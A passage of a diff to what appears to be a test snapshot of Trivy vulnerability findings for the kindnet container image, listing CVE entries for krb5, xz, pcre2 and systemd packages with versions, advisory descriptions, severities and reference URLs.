"https://access.redhat.com/security/cve/CVE-2019-3843", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", + "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", + "https://linux.oracle.com/cve/CVE-2019-3843.html", + "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", + "https://security.netapp.com/advisory/ntap-20190619-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-3843", + ], + }, + "category": "Vulnerability", + "description": "It was discovered that a systemd service that uses DynamicUser property can create a SUID/SGID binary that would be allowed to run as the transient service UID/GID even after the service is terminated. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the UID/GID will be recycled.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "systemd: services with DynamicUser can create SUID/SGID binaries", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-3843", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "http://www.securityfocus.com/bid/108116", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-3843", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://linux.oracle.com/cve/CVE-2019-3843.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://ubuntu.com/security/notices/USN-4269-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://usn.ubuntu.com/4269-1/", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-3843", }, ], "severity": "HIGH", @@ -90846,620 +91625,655 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5support0", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-3844", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "http://www.securityfocus.com/bid/108096", + "https://access.redhat.com/security/cve/CVE-2019-3844", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", + "https://linux.oracle.com/cve/CVE-2019-3844.html", + "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", + "https://security.netapp.com/advisory/ntap-20190619-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-3844", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "description": "It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "systemd: services with DynamicUser can get new privileges and create SGID binaries", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", - }, - { - "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - }, - { - "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2019-3844", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "http://www.securityfocus.com/bid/108096", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "5.2.5-2.1~deb11u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1271", - "installedVersion": "5.2.5-2", - "packageName": "liblzma5", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:4940", - "https://access.redhat.com/security/cve/CVE-2022-1271", - "https://bugzilla.redhat.com/2073310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", - "https://errata.almalinux.org/9/ALSA-2022-4940.html", - "https://errata.rockylinux.org/RLSA-2022:4940", - "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", - "https://linux.oracle.com/cve/CVE-2022-1271.html", - "https://linux.oracle.com/errata/ELSA-2022-5052.html", - "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", - "https://security-tracker.debian.org/tracker/CVE-2022-1271", - "https://security.gentoo.org/glsa/202209-01", - "https://security.netapp.com/advisory/ntap-20220930-0006/", - "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", - "https://ubuntu.com/security/notices/USN-5378-1", - "https://ubuntu.com/security/notices/USN-5378-2", - "https://ubuntu.com/security/notices/USN-5378-3", - "https://ubuntu.com/security/notices/USN-5378-4", - "https://www.cve.org/CVERecord?id=CVE-2022-1271", - "https://www.openwall.com/lists/oss-security/2022/04/07/8", - ], - }, - "category": "Vulnerability", - "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "arbitrary-file-write vulnerability", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1271", + "value": "https://access.redhat.com/security/cve/CVE-2019-3844", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:4940", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1271", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2073310", + "value": "https://linux.oracle.com/cve/CVE-2019-3844.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4940", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", }, { "type": "URL", - "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", + "value": "https://ubuntu.com/security/notices/USN-4269-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "value": "https://usn.ubuntu.com/4269-1/", }, { "type": "URL", - "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-3844", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "241-7~deb10u9", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-26604", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-26604", + "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", + "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", + "https://github.com/systemd/systemd/issues/5666", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", + "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", + "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", + "https://security.netapp.com/advisory/ntap-20230505-0009/", + "https://www.cve.org/CVERecord?id=CVE-2023-26604", + ], + }, + "category": "Vulnerability", + "description": "systemd before 247 does not adequately block local privilege escalation for some Sudo configurations, e.g., plausible sudoers files in which the "systemctl status" command may be executed. Specifically, systemd does not set LESSSECURE to 1, and thus other programs may be launched from the less program. This presents a substantial security risk when running systemctl from Sudo, because less executes as root when the terminal size is too small to show the complete systemctl output.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "privilege escalation via the less pager", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "value": "https://avd.aquasec.com/nvd/cve-2023-26604", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "value": "https://access.redhat.com/security/cve/CVE-2023-26604", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-01", + "value": "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", }, { "type": "URL", - "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "value": "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-1", + "value": "https://github.com/systemd/systemd/issues/5666", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-2", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-3", + "value": "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-4", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "value": "https://security.netapp.com/advisory/ntap-20230505-0009/", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-26604", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "10.36-2+deb11u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1586", - "installedVersion": "10.36-2", - "packageName": "libpcre2-8-0", + "fixedVersion": "241-7~deb10u8", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33910", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/errata/RHSA-2022:5809", - "https://access.redhat.com/security/cve/CVE-2022-1586", - "https://bugzilla.redhat.com/2077976", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", - "https://errata.almalinux.org/8/ALSA-2022-5809.html", - "https://errata.rockylinux.org/RLSA-2022:5809", - "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", - "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", - "https://linux.oracle.com/cve/CVE-2022-1586.html", - "https://linux.oracle.com/errata/ELSA-2022-5809.html", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", - "https://security.netapp.com/advisory/ntap-20221028-0009/", - "https://ubuntu.com/security/notices/USN-5627-1", - "https://ubuntu.com/security/notices/USN-5627-2", - "https://www.cve.org/CVERecord?id=CVE-2022-1586", + "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", + "https://access.redhat.com/security/cve/CVE-2021-33910", + "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", + "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", + "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", + "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", + "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", + "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", + "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", + "https://linux.oracle.com/cve/CVE-2021-33910.html", + "https://linux.oracle.com/errata/ELSA-2021-2717.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20211104-0008/", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2021-33910", + "https://www.debian.org/security/2021/dsa-4942", + "https://www.openwall.com/lists/oss-security/2021/07/20/2", + "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", ], }, "category": "Vulnerability", - "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the compile_xclass_matchingpath() function of the pcre2_jit_compile.c file. This involves a unicode property matching issue in JIT-compiled regular expressions. The issue occurs because the character was not fully read in case-less matching within JIT.", + "description": "basic/unit-name.c in systemd prior to 246.15, 247.8, 248.5, and 249.1 has a Memory Allocation with an Excessive Size Value (involving strdupa and alloca for a pathname controlled by a local attacker) that results in an operating system crash.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre2: Out-of-bounds read in compile_xclass_matchingpath in pcre2_jit_compile.c", + "name": "systemd: uncontrolled allocation on the stack in function unit_name_path_escape leads to crash", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1586", + "value": "https://avd.aquasec.com/nvd/cve-2021-33910", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:5809", + "value": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1586", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2077976", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", + "value": "https://access.redhat.com/security/cve/CVE-2021-33910", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2022-5809.html", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5809", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", }, { "type": "URL", - "value": "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", + "value": "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", }, { "type": "URL", - "value": "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", + "value": "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1586.html", + "value": "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5809.html", + "value": "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "value": "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "value": "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "value": "https://linux.oracle.com/cve/CVE-2021-33910.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "value": "https://linux.oracle.com/errata/ELSA-2021-2717.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-1", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-2", + "value": "https://security.netapp.com/advisory/ntap-20211104-0008/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1586", + "value": "https://ubuntu.com/security/notices/USN-5013-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33910", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2021/dsa-4942", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2021/07/20/2", + }, + { + "type": "URL", + "value": "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "10.36-2+deb11u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1587", - "installedVersion": "10.36-2", - "packageName": "libpcre2-8-0", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3997", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-1587", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", - "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", - "https://linux.oracle.com/cve/CVE-2022-1587.html", - "https://linux.oracle.com/errata/ELSA-2022-5251.html", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", - "https://security.netapp.com/advisory/ntap-20221028-0009/", - "https://ubuntu.com/security/notices/USN-5627-1", - "https://ubuntu.com/security/notices/USN-5627-2", - "https://www.cve.org/CVERecord?id=CVE-2022-1587", + "https://access.redhat.com/security/cve/CVE-2021-3997", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", + "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5226-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3997", + "https://www.openwall.com/lists/oss-security/2022/01/10/2", ], }, "category": "Vulnerability", - "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the get_recurse_data_length() function of the pcre2_jit_compile.c file. This issue affects recursions in JIT-compiled regular expressions caused by duplicate data transfers.", + "description": "A flaw was found in systemd. An uncontrolled recursion in systemd-tmpfiles may lead to a denial of service at boot time when too many nested directories are created in /tmp.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre2: Out-of-bounds read in get_recurse_data_length in pcre2_jit_compile.c", + "name": "systemd: Uncontrolled recursion in systemd-tmpfiles when removing files", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1587", + "value": "https://avd.aquasec.com/nvd/cve-2021-3997", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1587", + "value": "https://access.redhat.com/security/cve/CVE-2021-3997", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", }, { "type": "URL", - "value": "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", + "value": "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1587.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5251.html", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "value": "https://ubuntu.com/security/notices/USN-5226-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3997", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "value": "https://www.openwall.com/lists/oss-security/2022/01/10/2", + }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + 